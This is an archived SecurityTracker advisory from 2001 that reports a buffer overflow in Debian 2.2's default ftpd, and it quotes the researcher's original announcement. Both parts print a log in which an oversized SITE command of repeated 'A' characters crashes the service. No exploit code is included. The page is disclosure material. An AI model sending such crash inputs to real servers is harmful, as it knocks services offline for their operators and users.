SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FTP (Generic) Vendors:   Debian
Debian Linux FTP Server Allows Remote Users to Crash the Server and May Potentially Allow for Remote Code Execution
SecurityTracker Alert ID:  1001579
SecurityTracker URL:  http://securitytracker.com/id/1001579
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 18 2001
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): Debian 2.2 with 2.2r3 default ftpd daemon Version 6.2/OpenBSD/Linux-0.10
Description:   It is reported that the FTP server that comes with Debian 2.2 contains a vulnerability that allows a remote user to crash the FTP server and may allow remote users to cause the server to execute arbitrary code.

The vulnerability is reportedly triggered when a buffer of approximately greater than 400 bytes is sent in a SITE request.

A transcript of an exploit scenario:

May 18 12:32:46 ts ftpd[677]: ts FTP server (Version 6.2/OpenBSD/Linux-0.10)
ready.
May 18 12:32:47 ts ftpd[677]: command: SITE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
May 18 12:32:47 ts ftpd[677]: <--- 500
May 18 12:32:47 ts ftpd[677]: 'SITE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA': command not understood.
May 18 12:32:47 ts ftpd[677]: <--- 221
May 18 12:32:47 ts ftpd[677]: You could at least say goodbye.
May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service
terminated

No exploit code was released in this report.

Impact:   A remote user can crash the FTP server and may allow remote users to cause the server to execute arbitrary code (however, the remote code execution has not been confirmed).
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.debian.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Debian)

Message History:   None.


 Source Message Contents

Subject:  Tamersahin.net Security Announcement: Debian 2.2 is 2.2r3 Ftpd Daemon Buffer Owerflow Vulnerability


=========================================
Tamersahin.net Security Announcement
=========================================
DEBIAN 2.2 is 2.2r3 FTPD DAEMON BUFFER OWERFLOW
=========================================

Release Date:
==========
May 18, 2001

Severity:
=======
High.

Systems Affected:
==============
Debian 2.2 is 2.2r3 default ftpd daemon Version 6.2/OpenBSD/Linux-0.10.

Concept:
=======
The vulnerability arises when a buffer of aprox. 400 bytes and more is sent
within
the ftpd daemon running Debian host header for a SITE request.

Example:
=======
May 18 12:32:46 ts ftpd[677]: ts FTP server (Version 6.2/OpenBSD/Linux-0.10)
ready.
May 18 12:32:47 ts ftpd[677]: command: SITE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
May 18 12:32:47 ts ftpd[677]: <--- 500
May 18 12:32:47 ts ftpd[677]: 'SITE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA': command not understood.
May 18 12:32:47 ts ftpd[677]: <--- 221
May 18 12:32:47 ts ftpd[677]: You could at least say goodbye.
May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service
terminated

Exploit Code:
==========
Not yet.

Author:
======
Tamer Sahin
http://www.tamersahin.net
feedback@tamersahin.net

Copyright (c) 1995-2001 tamersahin.net


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC